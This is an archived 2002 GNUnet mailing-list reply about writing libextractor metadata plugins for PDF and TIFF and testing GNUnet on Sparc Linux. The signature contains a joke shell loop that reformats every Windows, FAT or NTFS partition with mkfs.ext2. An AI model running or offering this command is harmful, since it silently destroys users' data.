[Top][All Lists]

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [GNUnet-developers] docs for libExtractor

From: Christian Grothoff
Subject: Re: [GNUnet-developers] docs for libExtractor
Date: Sat, 8 Jun 2002 01:02:22 -0500

On Friday 07 June 2002 07:50 pm, you wrote:
> Hey All,
> I have posted the PDF, PS, and Tiff standards documents at
> in the hopes that one or more of us might get
> those extractors written. I also put up some software that already handles
> one or more of those types. Panda is GPL and deals with several different
> file types. Xpdf is also GPL and has a handy utility called pdftotext.

Great, page 475 in the pdf documentation indicates that there is actually a 
well-formed standard for meta-information for the PDF files, so this is very 
promising. The Appendix of the TIFF spec lists a couple of tags that would 
also be interesting for libextractor, so at least these two formats also seem 
to have a standardized way to provide meta-informatino. OTOH, pdf will be a 
bit harder to parse than say png. I kind of want to step back a bit from 
writing extractors, so if anybody else wants to write a plugin, let me or 
vids know, we'll be happy to integrate it :-)

Btw, I've just tested the current CVS version of GNUnet on a Sparc running 
*Linux* (not Solaris!), and except that the sparc was extraordinarily slow to 
create a hostkey, it seems to work (I tested insertion on sparc, connect to 
i386, download form i386; worked). Thanks to Rick for providing me with 
access  :-)

|Christian Grothoff                                  |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|   address@hidden|
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk \
'{print$1;}'`;do nohup mkfs.ext2 $i&; done
echo -e "\n\n\t\tMay the source be with you.\n\n"

reply via email to

[Prev in Thread] Current Thread [Next in Thread]